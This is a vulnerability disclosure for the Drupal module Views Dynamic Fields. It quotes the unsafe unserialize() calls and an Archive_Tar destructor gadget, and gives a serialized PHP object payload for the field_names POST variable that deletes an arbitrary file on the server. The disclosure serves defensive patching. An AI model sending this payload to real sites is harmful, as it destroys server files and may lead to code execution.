Note: The description will be also posted on fulldisclosure mailing list.
Drupal module - Views Dynamic Fields - insecure deserialization
═════════════════════════════════════════════════════════════════
Product: Views Dynamic Fields
Version: <=7.x-1.0-alpha4
URL: [https://www.drupal.org/project/views_dynamic_fields]
CVSS v3: 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
Drupal module "Views Dynamic Fields" which allows for dynamic
specification of fields to be presented in a view allows a remote
attacker to inject arbitrary PHP object which will be further
serialized. The vulnerable code is in file :
┌────
│ $ grep -C3 -n 'unserialize' handlers/views_handler_filter_dynamic_fields.inc
│
│ 278- = $exposed_input[$this->options['expose']['identifier']];
│ 279- $exposed_field_names
│ 280- = isset($exposed_input['field_names'])
│ 281: ? unserialize($exposed_input['field_names']) : $field_names;
│ 282- }
│ 283- $this->options['expose']['multiple'] = $this->options['checkboxes'];
│ 284-
│ --
│ 480-
│ 481- // Exclude these fields.
│ 482- $combined_fields = isset($exposed_input['combined'])
│ 483: ? unserialize($exposed_input['combined']) : array();
│ 484- if (!$this->options['checkboxes']) {
│ 485- $this
│ 486- ->pre_query_single($exposed_input, $field_names, $combined_fields);
│ --
│ 564-
│ 565- // Fields displayed in the filter.
│ 566- $form_field_names = isset($exposed_input['field_names'])
│ 567: ? unserialize($exposed_input['field_names']) : $field_names;
│ 568- $orig_field_exposed = $order_includes = $order_excludes = array();
│ 569- foreach ($exposed_input_fields as $id => $info) {
│ 570- $orig_field_exposed[$info['sort']] = $form_field_names[$id];
└────
This can further lead to arbitrary attack vectors. A Proof of Concept
is to add to the field_names object an instance of Archive_Tar drupal
object which deletes any file on the server pointed by its
_temp_tarname field. The used Drupal's Archive_Tar code:
┌────
│ public function __destruct()
│ {
│ $this->_close();
│ // ----- Look for a local copy to delete
│ if ($this->_temp_tarname != '') {
│ @drupal_unlink($this->_temp_tarname);
│ }
│ }
└────
Thus pushing into the filed_names POST array variable an object of
Archive_Tar type allows to trigger arbitrary file deletion. For
example following value of field_names:
┌────
│ a:1:{i:0;O:11:"Archive_Tar":1:{s:13:"_temp_tarname";s:9:"/tmp/test";}}
└────
Deletes the /tmp/test file on server.
Depending on the amout of different classes loaded this could be
further exploited in many ways, in special cases even to code
execution.
Comments